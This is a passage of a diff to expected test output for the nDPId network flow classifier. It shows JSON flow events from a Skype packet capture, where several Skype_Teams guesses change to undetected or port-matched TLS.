 00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969658376,"flow_last_seen":1431969684569,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":9,"midstream":0,"ts_msec":1431969802183,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50035,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969657367,"flow_last_seen":1431969688218,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431969802183,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50032,"dst_port":40032,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969657367,"flow_last_seen":1431969688218,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431969802183,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50032,"dst_port":40032,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969657367,"flow_last_seen":1431969688218,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431969802183,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50032,"dst_port":40032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00615{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969658979,"flow_last_seen":1431969687310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1431969802183,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50037,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00632{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969658979,"flow_last_seen":1431969687310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1431969802183,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50037,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969658979,"flow_last_seen":1431969687310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1431969802183,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50037,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00616{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969664990,"flow_last_seen":1431969683864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969802183,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50045,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00633{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969664990,"flow_last_seen":1431969683864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969802183,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50045,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969664990,"flow_last_seen":1431969683864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969802183,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50045,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969667019,"flow_last_seen":1431969685356,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":347,"flow_avg_l4_payload_len":23,"midstream":0,"ts_msec":1431969802183,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50048,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969667019,"flow_last_seen":1431969685356,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":347,"flow_avg_l4_payload_len":23,"midstream":0,"ts_msec":1431969802183,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969667019,"flow_last_seen":1431969685356,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":347,"flow_avg_l4_payload_len":23,"midstream":0,"ts_msec":1431969802183,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969669039,"flow_last_seen":1431969688720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":23,"midstream":0,"ts_msec":1431969802183,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50051,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969669039,"flow_last_seen":1431969688720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":23,"midstream":0,"ts_msec":1431969802183,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50051,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969669039,"flow_last_seen":1431969688720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":23,"midstream":0,"ts_msec":1431969802183,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00598{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969659988,"flow_last_seen":1431969685175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969802183,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50039,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969659988,"flow_last_seen":1431969685175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969802183,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50039,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969659988,"flow_last_seen":1431969685175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969802183,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50039,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3269,"source":"skype.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431969771806,"flow_last_seen":1431969808100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2836,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1431969808100,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50138,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969704664,"flow_last_seen":1431969723753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":251,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50098,"dst_port":40026,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969704664,"flow_last_seen":1431969723753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":251,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50098,"dst_port":40026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00616{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969673443,"flow_last_seen":1431969692603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50054,"dst_port":40005,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969673443,"flow_last_seen":1431969692603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50054,"dst_port":40005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969673443,"flow_last_seen":1431969692603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50054,"dst_port":40005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969642087,"flow_last_seen":1431969695591,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52850,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00615{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969689470,"flow_last_seen":1431969722520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":11,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50074,"dst_port":40003,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969689470,"flow_last_seen":1431969722520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":11,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50074,"dst_port":40003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969689470,"flow_last_seen":1431969722520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":11,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50074,"dst_port":40003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00615{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969673443,"flow_last_seen":1431969701671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50053,"dst_port":40030,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969673443,"flow_last_seen":1431969701671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50053,"dst_port":40030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969673443,"flow_last_seen":1431969701671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50053,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969675950,"flow_last_seen":1431969702405,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63108,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00615{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969683498,"flow_last_seen":1431969716234,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50070,"dst_port":40018,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969683498,"flow_last_seen":1431969716234,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50070,"dst_port":40018,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969683498,"flow_last_seen":1431969716234,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50070,"dst_port":40018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00615{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969689470,"flow_last_seen":1431969717232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50076,"dst_port":40014,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969689470,"flow_last_seen":1431969717232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50076,"dst_port":40014,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969689470,"flow_last_seen":1431969717232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50076,"dst_port":40014,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969681480,"flow_last_seen":1431969709213,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50067,"dst_port":40027,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969681480,"flow_last_seen":1431969709213,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50067,"dst_port":40027,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969681480,"flow_last_seen":1431969709213,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50067,"dst_port":40027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00615{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969690481,"flow_last_seen":1431969722726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":11,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50077,"dst_port":40022,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969690481,"flow_last_seen":1431969722726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":11,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50077,"dst_port":40022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969690481,"flow_last_seen":1431969722726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":11,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50077,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00615{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969699577,"flow_last_seen":1431969718631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":50092,"dst_port":40020,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
